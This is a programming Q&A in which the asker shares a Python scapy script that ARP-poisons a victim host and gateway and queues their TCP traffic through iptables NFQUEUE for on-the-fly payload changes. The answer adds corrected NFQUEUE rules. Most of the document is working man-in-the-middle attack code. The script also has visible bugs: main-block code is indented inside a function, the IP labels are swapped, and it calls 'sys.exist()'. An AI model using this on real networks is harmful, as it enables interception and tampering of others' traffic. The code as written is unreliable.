# MITM and payload injection with python

Tags: python, iptables, scapy, arp, netfilter

i try to poison my local network (MITM) to get value send over the TCP , change it and send it. ( Use scapy and Netfilter with iptables )
i don't is it possible change packet on the fly or i have to create copy of that then drop it and send new packet with changed specific  value.
for now i wrote this code but i don't see any packet.

```
/proc/net/netfilter/nfnetlink_queue 
0  48352     0 2 65531     0     0        0  1
```

iptables rule :

```
iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE
```

192.168.3.2 is victim and 192.168.0.1 is gateway
and forwarding :

```
   /proc/sys/net/ipv4/ip_forward
1
```

here is my code :

```
    from scapy.all import *
from scapy.error import Scapy_Exception
import os
import sys
import threading
import signal
from netfilterqueue import NetfilterQueue
import nfqueue

INTERFACE       =   'eth0'
TARGET_IP       =   '192.168.0.1'
GATEWAY_IP      =   '192.168.0.2'
PACKET_COUNT    =  100

def test (packet):
    print packet.show()
    packet.accept()

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print '[*] Restoring targets...'
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
        hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
        hwsrc=target_mac), count=5)
    os.kill(os.getpid(), signal.SIGINT)

def get_mac(ip_address):
    response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
        timeout=2, retry=10)
    for s, r in response:
        return r[Ether].src
    return None

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print '[*] Beginning the ARP poison. [CTRL-C to stop]'
    while 1:
        try:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)

        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

        print '[*] ARP poison attack finished.'
        return

    if __name__ == '__main__':
        conf.iface = INTERFACE
        conf.verb = 0
        print "[*] Setting up %s" % INTERFACE
        GATEWAY_MAC = get_mac(GATEWAY_IP)
        if GATEWAY_MAC is None:
            print "[-] Failed to get gateway MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)

        TARGET_MAC = get_mac(TARGET_IP)
        if TARGET_MAC is None:
            print "[-] Failed to get target MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)

    poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
        TARGET_IP, TARGET_MAC))
    poison_thread.start()

    # Create Queue
    q = nfqueue.queue()
    q.open()
    q.bind(socket.AF_INET)
    q.set_callback(test)
    q.create_queue(0)

    try:
        print '[*] Starting sniffer for %d packets' %PACKET_COUNT
        bpf_filter = 'IP host ' + TARGET_IP
        q.try_run()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)

    except Scapy_Exception as msg:
        print msg, "Hi there!!"

    except KeyboardInterrupt:
        q.unbind(socket.AF_INET)
        q.close()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
        sys.exist()
```

i'm sure ARP-poisoning is work very well but i don't know why it's print nothing
referring these links :
[ARP-poisoning](https://medium.com/@ismailakkila/black-hat-python-arp-cache-poisoning-with-scapy-7cb1d8b9d242)
and
[Change TCP Payload](https://stackoverflow.com/questions/27293924/change-tcp-payload-with-nfqueue-scapy)
and

[altering-packets-on-the-fly-with-scapy](https://stackoverflow.com/questions/39765107/altering-packets-on-the-fly-with-scapy-as-a-mitm)

Answer (score 0):

You should specify which queue you are using for the input and for the established connection. For example, queue 0, with 192.168.0.2 as your gateway (assuming you are the gateway and the one that does the masquerade):

```
iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE --queue-num 0
iptables -I OUTPUT -d 192.168.0.2 -p tcp --sport 6767 -m conntrack --ctstate RELATED,ESTABLISHED -j NFQUEUE --queue-num 0
```

And please fix your code, seems like some code from the "main" has slipped into "poison_target"